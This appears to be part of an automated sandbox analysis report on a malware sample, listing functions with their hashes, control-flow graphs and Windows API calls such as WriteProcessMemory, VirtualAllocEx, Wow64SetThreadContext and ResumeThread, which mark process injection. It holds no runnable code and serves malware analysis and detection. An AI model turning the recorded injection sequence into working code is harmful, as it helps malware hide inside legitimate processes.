                        • Instruction Fuzzy Hash: 2C4117B5A00205DFDB14CF95C488AAAFBF5FB88314F24C459E519AB361D374A841DBA1
                        Function 028F4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2059 28f4514-28f59d9 CreateActCtxA 2064 28f59db-28f59e1 2059->2064 2065 28f59e2-28f5a3c 2059->2065 2064->2065 2072 28f5a3e-28f5a41 2065->2072 2073 28f5a4b-28f5a4f 2065->2073 2072->2073 2074 28f5a51-28f5a5d 2073->2074 2075 28f5a60-28f5a90 2073->2075 2074->2075 2079 28f5a42-28f5a47 2075->2079 2080 28f5a92-28f5b14 2075->2080 2079->2073
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 028F59C9
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 96417efc4b4ed7c6afd3e61da82e75e17a71878ac632d63c265acbcaeca03d40
                        • Instruction ID: 0713a5ef710e179d30765c87426fd45e831692dd4c721e359cb27e0c8fab5c3e
                        • Opcode Fuzzy Hash: 96417efc4b4ed7c6afd3e61da82e75e17a71878ac632d63c265acbcaeca03d40
                        • Instruction Fuzzy Hash: 2541B274D0071DCBEB24DFA9C884BDEBBB5BF48314F60806AD508AB251D7756949CF90
                        Function 028F5A84 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2083 28f5a84-28f5a90 2084 28f5a42-28f5a47 2083->2084 2085 28f5a92-28f5b14 2083->2085 2088 28f5a4b-28f5a4f 2084->2088 2089 28f5a51-28f5a5d 2088->2089 2090 28f5a60-28f5a61 2088->2090 2089->2090 2090->2083
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 19a8a16011f37b449cdffebed76d457c2c3eeacbb9161f67c6f067e979e561ff
                        • Instruction ID: 5efac11446c365e941575a36a1d81aa8c3c406a7f76a2e75d9f53b81db1a1b29
                        • Opcode Fuzzy Hash: 19a8a16011f37b449cdffebed76d457c2c3eeacbb9161f67c6f067e979e561ff
                        • Instruction Fuzzy Hash: B731BC79804348CFEF14CFA8C8547EEBBF1BF06318FA44089C505AB265D7B9A94ACB51
                        Function 071573E8 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2093 71573e8-715743e 2096 7157440-715744c 2093->2096 2097 715744e-715748d WriteProcessMemory 2093->2097 2096->2097 2099 7157496-71574c6 2097->2099 2100 715748f-7157495 2097->2100 2100->2099
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07157480
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 4f3358a5da723eead7846115219fce4e256c028251f0a2cb9e7d66bd6428e344
                        • Instruction ID: 9bc31e09c9b23ab7d3ab6137bd28221de41fc7e7d275ed94967d959d25076d01
                        • Opcode Fuzzy Hash: 4f3358a5da723eead7846115219fce4e256c028251f0a2cb9e7d66bd6428e344
                        • Instruction Fuzzy Hash: 9D2148B19003599FDB10CFAAC885BDEBBF5FF48310F10842AE958A7280C7789540CBA5
                        Function 071573F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2104 71573f0-715743e 2106 7157440-715744c 2104->2106 2107 715744e-715748d WriteProcessMemory 2104->2107 2106->2107 2109 7157496-71574c6 2107->2109 2110 715748f-7157495 2107->2110 2110->2109
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07157480
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 1a9e1fe3c3d3c36248a2c122345bfc278818044c66262d03330ddeffb45f3fcb
                        • Instruction ID: 92299c6baf3fdd2704c751a0ae78669f36ac5cb5cb49d0eeefc6a0f9bc86f1ce
                        • Opcode Fuzzy Hash: 1a9e1fe3c3d3c36248a2c122345bfc278818044c66262d03330ddeffb45f3fcb
                        • Instruction Fuzzy Hash: BD2126B19003599FDB10CFAAC885BDEBBF5FF48310F10842AE918A7280C7789940CBA5
                        Function 071574D8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2114 71574d8-715756d ReadProcessMemory 2118 7157576-71575a6 2114->2118 2119 715756f-7157575 2114->2119 2119->2118
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07157560
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: ce21a5d045e488c2e1c0d8a4749d84798b3a17eaa3d36fa5bb059c1c3a6a9bc9
                        • Instruction ID: dd76cbf3b120b6118b6932e401386fceac52fb9c3ccfd61e7957dde82d0cc37d
                        • Opcode Fuzzy Hash: ce21a5d045e488c2e1c0d8a4749d84798b3a17eaa3d36fa5bb059c1c3a6a9bc9
                        • Instruction Fuzzy Hash: 2E2136B18003499FDB10CFAAC881BEEFBF5FF48310F10842AE958A7280D7789540CBA5
                        Function 07156E18 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07156E9E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 21774c33410f391dd392efc53f35e676cef65c40f263392a34d75e30a6b1d3d6
                        • Instruction ID: 6b4e17eac67fc07d018da25830b81b08cfa69c4d5c0b5f97ed0970398d3b9fd0
                        • Opcode Fuzzy Hash: 21774c33410f391dd392efc53f35e676cef65c40f263392a34d75e30a6b1d3d6
                        • Instruction Fuzzy Hash: DB2157B19003098FDB10DFAAC4847EFBBF4EF48314F54842AD959A7280C779A984CFA4
                        Function 028FAFD4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028FD58E,?,?,?,?,?), ref: 028FD64F
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 5abe04890d56d6e99a15b8ebb7aea2d8fcb2a39b878e422f17d17a4510560632
                        • Instruction ID: ce864d4ee568d914c38f94359085831617e4f5f940d6ed973ce3751b97ce13b1
                        • Opcode Fuzzy Hash: 5abe04890d56d6e99a15b8ebb7aea2d8fcb2a39b878e422f17d17a4510560632
                        • Instruction Fuzzy Hash: E621E6B59002489FDB10CFAAD884ADEFBF4FB48314F14845AE918A7350D378A954CFA5
                        Function 07156E20 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07156E9E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 71cb935601d6ed43bd30b0dc22885ac8c6a4acfbfab35ce7a65333dd7e63cd76
                        • Instruction ID: 1adf8df2064dc508fbe994a6515c191077d16cddb650b127e4fdb277a9f9fd10
                        • Opcode Fuzzy Hash: 71cb935601d6ed43bd30b0dc22885ac8c6a4acfbfab35ce7a65333dd7e63cd76
                        • Instruction Fuzzy Hash: 652138B19003098FDB14DFAAC4857EEBBF4EF48314F54842AD819A7280C7789944CFA4
                        Function 071574E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07157560
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: f124570ab58ae5125e28d96b942cd024dbb8deb6992c9e8c0d45e2cfe0f8271a
                        • Instruction ID: 4f4d7f108317d584bb2242479d455184297bbc26fa19d797a05f99833e0bede2
                        • Opcode Fuzzy Hash: f124570ab58ae5125e28d96b942cd024dbb8deb6992c9e8c0d45e2cfe0f8271a
                        • Instruction Fuzzy Hash: E52116B18003499FDB10DFAAC881BEEFBF5FF48310F50842AE919A7280C7789540CBA4
                        Function 07157329 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0715739E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 3c4a324e0d42f11e0339350ca02d8b6506a916912c4b66390abbb60c99646411
                        • Instruction ID: d0bea9c3071d4e91409af755c868445ceb6be6d61ec1b30ebe0db36476eaf68d
                        • Opcode Fuzzy Hash: 3c4a324e0d42f11e0339350ca02d8b6506a916912c4b66390abbb60c99646411
                        • Instruction Fuzzy Hash: 171159728003499FDB10DFAAC845BDFBBF5AF48320F148819E955A7290C7759540CFA4
                        Function 07157330 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0715739E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 6fa6dc0bdef5ee004722880d7f93320dd7a015e3794b16c0ab79964aafa19748
                        • Instruction ID: fb827d6412aca39c3c7ef2c38af9f658a6a31ad718ff92ff18bc99ada477a6be
                        • Opcode Fuzzy Hash: 6fa6dc0bdef5ee004722880d7f93320dd7a015e3794b16c0ab79964aafa19748
                        • Instruction Fuzzy Hash: D71126728002499FDB10DFAAC845BEFBBF5AF48320F148819E919A7290C775A540CFA4
                        Function 07156D70 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: e2f09dd8d0589d7b0d886da833ed6e2a1671c446d1117ad3cb671a88a7597727
                        • Instruction ID: 7b8d2afbb41d3cc3ca58a4ea16c82a5ae1cefd0c825b9e4ef0fbc8329dd4f332
                        • Opcode Fuzzy Hash: e2f09dd8d0589d7b0d886da833ed6e2a1671c446d1117ad3cb671a88a7597727
                        • Instruction Fuzzy Hash: A3113AB19043488FDB14DFAAC8457EFFBF4AF48724F14881AD559A7280C779A940CFA4
                        Function 07156D68 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 3e466c2f731c7a71950d6485568ffdaa8c934682923c80b576e87dcf2b984b78
                        • Instruction ID: ebcd172b612fb17d0aef11116840c4d0ec501b07afbaa51456c1c6eb3709ab77
                        • Opcode Fuzzy Hash: 3e466c2f731c7a71950d6485568ffdaa8c934682923c80b576e87dcf2b984b78
                        • Instruction Fuzzy Hash: EB1158B18003498FDB20DFAAC8447EFFBF5AF48214F14881AD459A7280C778A940CFA4
                        Function 0715A8A8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0715A90D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: a50fb5d29b7f03776a0ab8b211535baf671303a5d2b071b173daf1e65c321924
                        • Instruction ID: 7ec17c3e0dd8daf7c0c2043921165824c777bf47e4124af1081aea0819a21132
                        • Opcode Fuzzy Hash: a50fb5d29b7f03776a0ab8b211535baf671303a5d2b071b173daf1e65c321924
                        • Instruction Fuzzy Hash: A51113B58003599FDB20DF9AD845BDFBFF8EB48320F10841AE858A7240D375A540CFA1
                        Function 0715A134 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0715A90D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 8fe2122290f6ffdc49a5ae8ce412a3f6e04f5531c8ebbea684baf4947ac35273
                        • Instruction ID: d3ea72d1c2bb247611be932ffe20a22c22cf1804b389261ba5dd71704803fda4
                        • Opcode Fuzzy Hash: 8fe2122290f6ffdc49a5ae8ce412a3f6e04f5531c8ebbea684baf4947ac35273
                        • Instruction Fuzzy Hash: D811F5B5800359DFDB10DF9AC845BDEBBF8EB48324F108419E954A7240C375A944CFA5
                        Function 028FB2D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 028FB33E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 686814cfe002789146be6b9530e89f451837b40fc53ebd7d6680386494edb08d
                        • Instruction ID: 6511033a7971f54cb110c702e5d7b3c2988a6cef962003f5a395d2b9ff38877e
                        • Opcode Fuzzy Hash: 686814cfe002789146be6b9530e89f451837b40fc53ebd7d6680386494edb08d
                        • Instruction Fuzzy Hash: 2811E0BAD002498FDB10CF9AD444BDEFBF4AB88328F14846AD519A7250C379A545CFA5
                        Function 04F3F430 Relevance: .7, Instructions: 729COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c47ce9380def6d260a5e1d7e84ac53fe61ffbd7bd1d86d04b44d880ff137258e
                        • Instruction ID: ba1df09baa4d08c96da87148d6872f48f1df9044a35aea6fb3daafc46091338f
                        • Opcode Fuzzy Hash: c47ce9380def6d260a5e1d7e84ac53fe61ffbd7bd1d86d04b44d880ff137258e
                        • Instruction Fuzzy Hash: E0723C31D10609CFDB14EF68C894AADB7B1FF85315F048299D549AB265EB30AEC6CF90
                        Function 04F3C3E8 Relevance: .6, Instructions: 551COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: af6c1a1fa6503052f2254af9b7197d0761976fd8b77c70beba9292a89a40eb67
                        • Instruction ID: a9837ab8d3aafb4a819ae500d3ebb9ca2f87af3f0544f33f6fbc816ca5280389
                        • Opcode Fuzzy Hash: af6c1a1fa6503052f2254af9b7197d0761976fd8b77c70beba9292a89a40eb67
                        • Instruction Fuzzy Hash: 1F42E631E00659CBCB14EF68C8946EDF7B1FF89305F1186A9D459BB261EB30AA85CF40
                        Function 04F3C3D9 Relevance: .3, Instructions: 332COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f69e90f9c21cb000b329fd477828351d2ec81b97a134d65facc4b64a52b07ad3
                        • Instruction ID: 35dd3e223c656681efe29f917ecc81bdd1037ef5915288db1e99cb1151a5de69
                        • Opcode Fuzzy Hash: f69e90f9c21cb000b329fd477828351d2ec81b97a134d65facc4b64a52b07ad3
                        • Instruction Fuzzy Hash: E7E1F832E006598BDB24DF68C8946EDB7B1FF49315F1186A9D459BB251EB30BE82CF40
                        Function 04F33378 Relevance: .3, Instructions: 302COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7de6c26a91c06818bd5096450c6efb3911795fc48c8aae63697c204c391b75c5
                        • Instruction ID: 49824825f4e829b7048513440daa8904e8f1087998420b8058e226f321386172
                        • Opcode Fuzzy Hash: 7de6c26a91c06818bd5096450c6efb3911795fc48c8aae63697c204c391b75c5
                        • Instruction Fuzzy Hash: 35C18F35A003008BEB04EF79D8946A9B3A2FFC8301F1585B9D90AAF395DF74AC45CB91
                        Function 04F31858 Relevance: .2, Instructions: 215COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 91919b5ed1964f75e5bfdf61b602b8efc0dc840234e7f82ab90cc54d0acfff4a
                        • Instruction ID: 8c936a894f590aba8c6b2c0490c0c56bc2544b4a5d1277f75f59c088ee477eda
                        • Opcode Fuzzy Hash: 91919b5ed1964f75e5bfdf61b602b8efc0dc840234e7f82ab90cc54d0acfff4a
                        • Instruction Fuzzy Hash: D7814B74E002589FDB14DFA9C8946AEBBF2FF88310F14816AD409BB350DB749906CBA1
                        Function 04F358A4 Relevance: .2, Instructions: 203COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1365459a9ead2592a3bb92312a7c3a113b3a4e2ee085cfa99121f9694bf687ca
                        • Instruction ID: b61a3df5c6e590dc1ef8f71558b92db8887cdf94aa9334ac8e6c46b94f2ad656
                        • Opcode Fuzzy Hash: 1365459a9ead2592a3bb92312a7c3a113b3a4e2ee085cfa99121f9694bf687ca
                        • Instruction Fuzzy Hash: 28719F31A006059FEB15EF79C89459A77E2FFC932471085A9D509AB365EF30EC46CB81
                        Function 04F3EDC0 Relevance: .2, Instructions: 197COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b940c2ef12ec34db12004d708f5cf10bb334ba99eaf7cb9f29dc9e793605c57
                        • Instruction ID: d82a73f14be140f2c9fe52483327730b918a87f4aba2b6c644bfd67a207c3879
                        • Opcode Fuzzy Hash: 1b940c2ef12ec34db12004d708f5cf10bb334ba99eaf7cb9f29dc9e793605c57
                        • Instruction Fuzzy Hash: A691F87591060ADFCB01DFA8C880999FBF5FF89310B15C79AE819AB255E770E985CF80
                        Function 04F35F48 Relevance: .2, Instructions: 177COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8bc34a664fb9e9bc57b81040bf18f9f0090249f6848c936e76b252e2165f7f0
                        • Instruction ID: b5f1ef979ac7399af4dfcaf5ec9146ba829314db3fb99130c7ad51579024b971
                        • Opcode Fuzzy Hash: d8bc34a664fb9e9bc57b81040bf18f9f0090249f6848c936e76b252e2165f7f0
                        • Instruction Fuzzy Hash: 8C51D430A00206DFEB24EBA8D4956AEBBF2EF84315F148569D006E7385DF74AD46CB81
                        Function 04F374DB Relevance: .2, Instructions: 172COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4308dfb9617bd38aea93617e31927714bb711bc58084a75486bd66880f94df3b
                        • Instruction ID: a6d95fbaf7971317ef71f2acb49b0b67810ae350611b4c878fe984c16697f2c6
                        • Opcode Fuzzy Hash: 4308dfb9617bd38aea93617e31927714bb711bc58084a75486bd66880f94df3b
                        • Instruction Fuzzy Hash: 42718078A01208EFCB54EF99D894DAEBBB6FF48715B114098F901AB361DB31E841CF50
                        Function 04F34890 Relevance: .2, Instructions: 172COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b36920ea6a9e440ba2704703b1f928cfcd5dcb72b36283d383fef6f5d08f533c
                        • Instruction ID: d2f9eefc5e5b0cdfcd33e0669d32a06bbfbaa4467449e9b93e5112fe541c6571
                        • Opcode Fuzzy Hash: b36920ea6a9e440ba2704703b1f928cfcd5dcb72b36283d383fef6f5d08f533c
                        • Instruction Fuzzy Hash: 06713831E0231ADBCB05EFE9D8906DDBBB2FF84310F618618D016BB254EB706985CB95
                        Function 04F30BFC Relevance: .2, Instructions: 155COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f81563e74a22b8d923fc3252beaf8832b252906fb33e65758d1257406500bb5
                        • Instruction ID: 094f4a321123b50b71326157604a36aa8bf15ee0d8ee649194f7ea6ca30a487b
                        • Opcode Fuzzy Hash: 5f81563e74a22b8d923fc3252beaf8832b252906fb33e65758d1257406500bb5
                        • Instruction Fuzzy Hash: AB519E71E002499FDB14DFA9D904AEFBBF9EF88310F10852AE415E3250EB74A902CB90
                        Function 04F39118 Relevance: .1, Instructions: 148COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da6e4fef05f112a5652e9e5e8af2372b3fd76e0c201e451dc6065b8b67e5dbdb
                        • Instruction ID: 972a74926d639a4fe920586cc55dfd922958dfebdf9400bdeb07372bc00d63d1
                        • Opcode Fuzzy Hash: da6e4fef05f112a5652e9e5e8af2372b3fd76e0c201e451dc6065b8b67e5dbdb
                        • Instruction Fuzzy Hash: 9C51CE30A0070A8FCB18EF78D45459EBBF2FF88314B148A6DD409A7351EB75AD42CB91
                        Function 04F3EDB1 Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 594fe24720207ae5f98de8f83a0faa9eb2ae16efe366ad2d26d943b5bc41fcd0
                        • Instruction ID: d84e8f13a070b44a90d380035ab551aff69480ff48c2d7472013092cbc31dec1
                        • Opcode Fuzzy Hash: 594fe24720207ae5f98de8f83a0faa9eb2ae16efe366ad2d26d943b5bc41fcd0
                        • Instruction Fuzzy Hash: D651FA7191070ADFCB41DF68C880999FBB5FF49320B14C75AE859EB255EB70E985CB80
                        Function 04F385E8 Relevance: .1, Instructions: 143COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
